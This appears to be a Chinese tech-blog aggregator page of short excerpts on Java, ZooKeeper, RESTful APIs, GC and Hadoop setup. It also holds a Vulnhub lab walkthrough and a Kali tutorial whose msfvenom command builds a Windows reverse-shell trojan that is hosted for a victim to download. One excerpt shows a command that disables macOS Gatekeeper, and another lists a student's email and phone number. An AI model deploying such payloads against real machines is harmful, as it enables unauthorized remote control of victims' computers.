JDK

201771010112罗松《面向对象程序设计(java)》第一周学习总结

匆匆过客 提交于 2020-12-06 19:14:07
201771010112罗松 《 面向对象 程序设计 ( java ) 》 第一周学习总结 第一部分:课程准备部分 填写课程学习 平台注册账号, 平台名称 注册账号 博客园: www.cnblogs.com 如果优质豺狼它英勇披上婚纱 程序设计评测: https://pintia.cn/ 1139155785@qq.com 代码托管平台: https://github.com/ 1139155785@qq.com 中国大学 M OOC: https://www.icourse163.org/ 13687321240 以下回答是或否 是否加入课程班级博客群 是 是否加入课程 Q Q讨论群 是 第二部分:理论知识学习部分 第一章:主要向我们介绍了 Java 程序设计平台以及 Java “白皮书”的关键术语,然后向我们描述了 Java appelt 与 Internet ,最后还向我们介绍了 Java 的发展史和解释了关于 Java 的一些常见误解。 Java 并不只是一种语言,而是一个完整的平台,有一个庞大的库。是一种功能齐全的出色语言,是一个高质量的执行环境。 Java “白皮书”的关键术语,主要包括 11 个,有简单性、面向对象、分布性、健壮性、安全性、体系结构中立、可移植性、解释性、高能性、多线程、动态性。书中还详细对各个关键术语进行了论述。 Java appelt 与

好好说说Java中的常量池之Class常量池

家住魔仙堡 提交于 2020-12-06 19:13:52
好好说说Java中的常量池之Class常量池 在Java中,常量池的概念想必很多人都听说过。这也是面试中比较常考的题目之一。在Java有关的面试题中,一般习惯通过String的有关问题来考察面试者对于常量池的知识的理解,几道简单的String面试题难倒了无数的开发者。所以说,常量池是Java体系中一个非常重要的概念。 谈到常量池,在Java体系中,共用三种常量池。分别是字符串常量池、Class常量池和运行时常量池。 本文是《好好说说Java中的常量池》系列的第一篇,先来介绍一下到底什么是Class常量池。 什么是Class文件 在Java代码的编译与反编译那些事儿中我们介绍过Java的编译和反编译的概念。我们知道,计算机只认识0和1,所以程序员写的代码都需要经过编译成0和1构成的二进制格式才能够让计算机运行。 我们在深入分析Java的编译原理中提到过,为了让Java语言具有良好的跨平台能力,Java独具匠心的提供了一种可以在所有平台上都能使用的一种中间代码——字节码(ByteCode)。 有了字节码,无论是哪种平台(如Windows、Linux等),只要安装了虚拟机,都可以直接运行字节码。 同样,有了字节码,也解除了Java虚拟机和Java语言之间的耦合。这话可能很多人不理解,Java虚拟机不就是运行Java语言的么?这种解耦指的是什么? 其实

zookeeper学习(零)_安装与启动

六眼飞鱼酱① 提交于 2020-12-06 18:53:29
zookeeper学习(零)_安装与启动 最近换了新的电脑,终于买了梦寐以求的macbook。最近也换了新的公司,公司技术栈用到了zookeeper.当然自己也要安装学习下。省的渣渣的我,被鄙视就麻烦了。本篇文章只介绍如何安装,先安装上之后,再进行具体学习。 安装 本文使用 brew 进行安装,默默说一句,mac的系统是比win好用。没有安装brew和jdk的童鞋请先安装这2个。 1、 打开终端执行命令 brew install zookeeper 2、 启动执行 zkServer start 3、 执行zk连接 zkCli -timeout 5000 -server 127.0.0.1:2181 4、 简单操作 [zk: 127.0.0.1:2181(CONNECTED) 0] ls / [zookeeper] [zk: 127.0.0.1:2181(CONNECTED) 1] create /zk_test kevin Created /zk_test [zk: 127.0.0.1:2181(CONNECTED) 2] ls / [zookeeper, zk_test] [zk: 127.0.0.1:2181(CONNECTED) 3] get zk_test Command failed: java.lang.IllegalArgumentException: Path

java设计模式-----11、代理模式

。_饼干妹妹 提交于 2020-12-06 13:42:59
  Proxy模式又叫做代理模式,是构造型的设计模式之一,它可以为其他对象提供一种代理(Proxy)以控制对这个对象的访问。   所谓代理,是指具有与代理元(被代理的对象)具有相同的接口的类,客户端必须通过代理与被代理的目标类交互,而代理一般在交互的过程中(交互前后),进行某些特别的处理。   代理模式的结构   代理模式的角色与职责     1、subject(抽象主题角色) :真实主题与代理主题的共同接口或抽象类。     2、RealSubject(真实主题角色): 定义了代理角色所代表的真实对象。     3、Proxy(代理主题角色): 含有对真实主题角色的引用,代理角色通常在将客户端调用传递给真是主题对象之前或者之后执行某些操作,而不是单纯返回真实的对象。   举个例子说明一下代理模式   比如说买书,网上有很多专门卖书的网站,我们从这些商城买书,但是书不是这些商城印的,他们只负责卖,书是出版社印的,所以说到底,我们其实还是从出版社买书,网上书城只是出版社的代理,所以出版社是被代理对象,书城是代理对象。   所以,根据角色与职责划分, subject(抽象主题角色) 就是卖书,卖书是书城与出版社的共同功能, RealSubject(真实主题角色) 就是出版社,它的功能就是卖书,但不直接卖给用户,而是被书城代理,通过代理来卖, Proxy(代理主题角色) 就是书城

Mac上安装并配置JDK

陌路散爱 提交于 2020-12-06 11:50:33
1,下载 点击 官网 ,进入下载界面, 同意协议内容 找到对应的Mac版本, 2,安装 安装下载下来的文件,期间会要求输入一次电脑密码,然后自动安装完。 如果显示文件已经损坏,打开 终端 输入 sudo spctl --master-disable 表示可以安装非 app store 的软件。 3,配置环境变量 查看 JDK 在Mac系统上默认的安装位置, 打开 终端 app,输入 vim .bash_profile 回车以后,进入编辑,按键盘 i 键,进入编辑模式,输入 export JAVA_HOME=/Library/Java/JavaVirtualMachines/jdk1.8.0_191.jdk/Contents/Home export PATH=$PATH:$JAVA_HOME/bin export CLASSPATH=.:$JAVA_HOME/lib/dt.jar:$JAVA_HOME/lib/tools.jar 注意文件目录与上面的一致,(注意使用英文!) 输入完成以后,按键盘 esc 键,再输入 :wq ,表示保存编辑内容,并退出编辑页面。 4,确认配置正确 打开 终端 app,输入 java -version ,出现如下画面,表示配置成功。 来源: oschina 链接: https://my.oschina.net/u/4034521/blog/2992769

Restful风格接口

柔情痞子 提交于 2020-12-06 05:26:10
Restful风格接口 Restful风格的API是一种软件架构风格,设计风格而不是标准,只是提供了一组设计原则和约束条件。它主要用于客户端和服务器交互类的软件。基于这个风格设计的软件可以更简洁,更有层次,更易于实现缓存等机制。 在Restful风格中,用户请求的url使用同一个url而用请求方式:get,post,delete,put...等方式对请求的处理方法进行区分,这样可以在前后台分离式的开发中使得前端开发人员不会对请求的资源地址产生混淆和大量的检查方法名的麻烦,形成一个统一的接口。 规定如下 GET(SELECT):从服务器查询,可以在服务器通过请求的参数区分查询的方式。POST(CREATE):在服务器新建一个资源,调用insert操作。 PUT(UPDATE):在服务器更新资源,调用update操作。 PATCH(UPDATE):在服务器更新资源(客户端提供改变的属性)。(目前jdk7未实现,tomcat7也不行)。 DELETE(DELETE):从服务器删除资源,调用delete语句。 了解这个风格定义以后,我们举个例子 如果当前url是 http://localhost:8080/User 那么用户只要请求这样同一个URL就可以实现不同的增删改查操作,例如 http://localhost:8080/User?_method=get&id=1001 

Vulnhub靶场渗透练习(一) Breach1.0

拟墨画扇 提交于 2020-12-06 05:24:32
打开靶场 固定ip需要更改虚拟机为仅主机模式 192.168.110.140 打开网页http://192.168.110.140/index.html 查看源代码发现可以加密字符串 猜测base64 解密 cGdpYmJvbnM6ZGFtbml0ZmVlbCRnb29kdG9iZWFnYW5nJHRh 得到这个结果可能是二次加密在base64解密 得到 pgibbons:damnitfeel$goodtobeagang$ta 去除: 得到两个字符串pgibbons,damnitfeel$goodtobeagang$ta 点击图片每个路径都看看发现 可以登录 把刚刚拿到的两个密码进行尝试登录 登录成功 发现有3个邮件 192.168.110.140/.keystore 这个地址 为 ssl 加密证书的密钥库 继续搜索有用文件 发现 有信息泄露 通过邮件信息猜测 tomcat 发现 pcap 文件 为 wireshark 流量包 可以下载来分析 都是加密过的 可以利用前面的ssl 解密 利用java 的 keytool 获取证书 输入 D:\jdk\bin>keytool.exe -list -keystore 输入密钥库口令:tomcat 密钥库类型: jks 密钥库提供方: SUN 您的密钥库包含 1 个条目 tomcat, 2016-5-21, PrivateKeyEntry,

基于【CentOS-7+ Ambari 2.7.0 + HDP 3.0】搭建HAWQ数据仓库01 —— 准备环境,搭建本地仓库,安装ambari

孤者浪人 提交于 2020-12-06 02:33:05
一、集群软硬件环境准备: 操作系统: centos 7 x86_64.1804 Ambari版本:2.7.0 HDP版本:3.0.0 HAWQ版本:2.3.0 5台PC作为工作站: ep-bd01 ep-bd02 ep-bd03 ep-bd04 ep-bd05 其中ep-bd01作为主节点,用于安装ambari-server。 二、配置操作系统,安装必备软件 1,安装CentOS 7操作系统: 环境配置,安装必备软件。 2,安装配置NTP服务,保证集群时间保持同步,以防止由于时间不同而造成掉线故障。 详细看随笔: 基于【CentOS-7+ Ambari 2.7.0 + HDP 3.0】搭建HAWQ数据仓库之——安装配置NTP服务,保证集群时间保持同步 见《安装配置NTP服务》 3,安装MariaDB Server用于Ambari server以及Hue和Hive 详细过程,参见: 基于【CentOS-7+ Ambari 2.7.0 + HDP 3.0】搭建HAWQ数据仓库之一 —— MariaDB 安装配置 4,安装yum priorities plugin yum install yum -plugin-priorities -y 三、搭建本地仓库: 1,下载软件包: cd / root mkdir downloads cd downloads wget http: //

Java-Parallel GC介绍

十年热恋 提交于 2020-12-05 23:23:25
JVM 垃圾收集器发展历史 > JDK1.8中使用 jmap -heap pid 上面会出现 Parallel GC jmap -heap 18378 Attaching to process ID 18378, please wait... Debugger attached successfully. Server compiler detected. JVM version is 25.261-b12 using thread-local object allocation. Parallel GC with 4 thread(s) ### > JVM垃圾收集器的发展历史中,我们并没有找到 Parallel GC ,那么它到底代表什么? Parallel GC有两种组合 使用 -XX:+UseParallelGC 参数来启用 Parallel Scavenge 和 PSMarkSweep(Serial Old) 收集器组合进行垃圾收集。(图上可以找到) 使用 -XX:+UserParallelOldGC 参数来启用 Parallel scavenge 和 Parallel Old 收集器组合收集。(图上可以找到) Parallel GC起源 Young GC / Parallel Scavenge > Parallel Scavenge收集器(下称PS收集器

9.20 kali中的Metasploit生成木马控制windows 以及http协议相关

只愿长相守 提交于 2020-12-05 22:09:35
使用 kali 中的 Metasploit 生成木马控制 windows 系统 Kali 基于 BT5 R3 ,其中 Metasploit 是一个综合利用工具,能极大地提高攻击者的渗透效率,进入该工具的方式: msfconsole , MSF 依赖 Postgresql 数据库,使用前需要开启该数据库。 Step1 :生成木马, msfvenom Msfvenom -p windows/meterpreter/reverse_tcp lhost=kali 的 ip lport=5555 -f exe >/root/Desktop/evilshell.exe -p 参数后跟上 payload ,攻击成功之后要做什么事 lhost 后面跟监听的 ip lhost 后面跟监听的端口 -f 后面跟要生成后门文件 Step2 :将木马文件 evilshell.exe 拷贝到 /var/www/html 文件夹下,开启 apache 在肉鸡上打开浏览器,访问该站点 =kali 的 ip ,将木马文件下载都肉鸡上 Step3 :开启 MSF Msfconsole (提前查看 postgresql 状态) =[ metasploit v5.0.41-dev ] + -- --=[ 1914 exploits - 1074 auxiliary - 330 post ] + -- --=[ 556